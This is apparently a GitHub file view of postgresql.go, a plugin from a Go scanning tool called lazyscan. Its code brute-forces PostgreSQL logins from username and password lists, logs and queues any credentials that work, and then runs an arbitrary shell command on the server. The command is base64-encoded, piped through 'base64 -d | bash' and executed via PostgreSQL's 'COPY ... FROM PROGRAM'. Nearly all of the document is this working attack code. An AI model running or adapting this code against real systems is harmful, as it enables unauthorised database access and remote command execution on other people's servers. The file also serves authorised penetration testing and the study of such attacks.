-
Notifications
You must be signed in to change notification settings - Fork 4
/
postgresql.go
72 lines (66 loc) · 1.87 KB
/
postgresql.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
package plugins
import (
"context"
"database/sql"
"encoding/base64"
"errors"
"fmt"
"log"
"strings"
"time"
"github.com/404tk/lazyscan/common"
_ "github.com/lib/pq"
)
func PostgreScan(info *common.HostInfo) error {
starttime := time.Now().Unix()
for _, user := range info.Usernames {
for _, pass := range info.Passwords {
pass = strings.Replace(pass, "{user}", string(user), -1)
flag, err := PostgresConn(info, user, pass)
if flag == true {
return err
} else {
if time.Now().Unix()-starttime > (int64(len(info.Usernames)*len(info.Passwords)) * info.Timeout) {
return errors.New("timeout.")
}
}
}
}
return nil
}
func PostgresConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", user, pass, info.Host, info.Port, "postgres", "disable")
db, err := sql.Open("postgres", dataSourceName)
if err == nil {
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
defer db.Close()
err = db.Ping()
if err == nil {
result := fmt.Sprintf("[%s:%s] Postgres credential %s/%s", info.Host, info.Port, user, pass)
log.Println(result)
if info.Queue != nil {
vuln := common.Vuln{
Host: info.Host,
Port: info.Port,
User: user,
Pass: pass,
}
info.Queue.Push(vuln)
}
cmd := info.Command.TCPCommand
if cmd != "" {
b64 := base64.StdEncoding.EncodeToString([]byte(cmd))
cmd = fmt.Sprintf("echo %s | base64 -d | bash", b64)
PostgreExec(db, cmd)
}
flag = true
}
}
return flag, err
}
func PostgreExec(db *sql.DB, cmd string) {
ctx, cancel := context.WithTimeout(context.Background(), 3*time.Second)
defer cancel()
query := fmt.Sprintf("DROP TABLE IF EXISTS cmd_exec;CREATE TABLE cmd_exec(cmd_output text);COPY cmd_exec FROM PROGRAM '%s';SELECT * FROM cmd_exec", cmd)
db.ExecContext(ctx, query)
}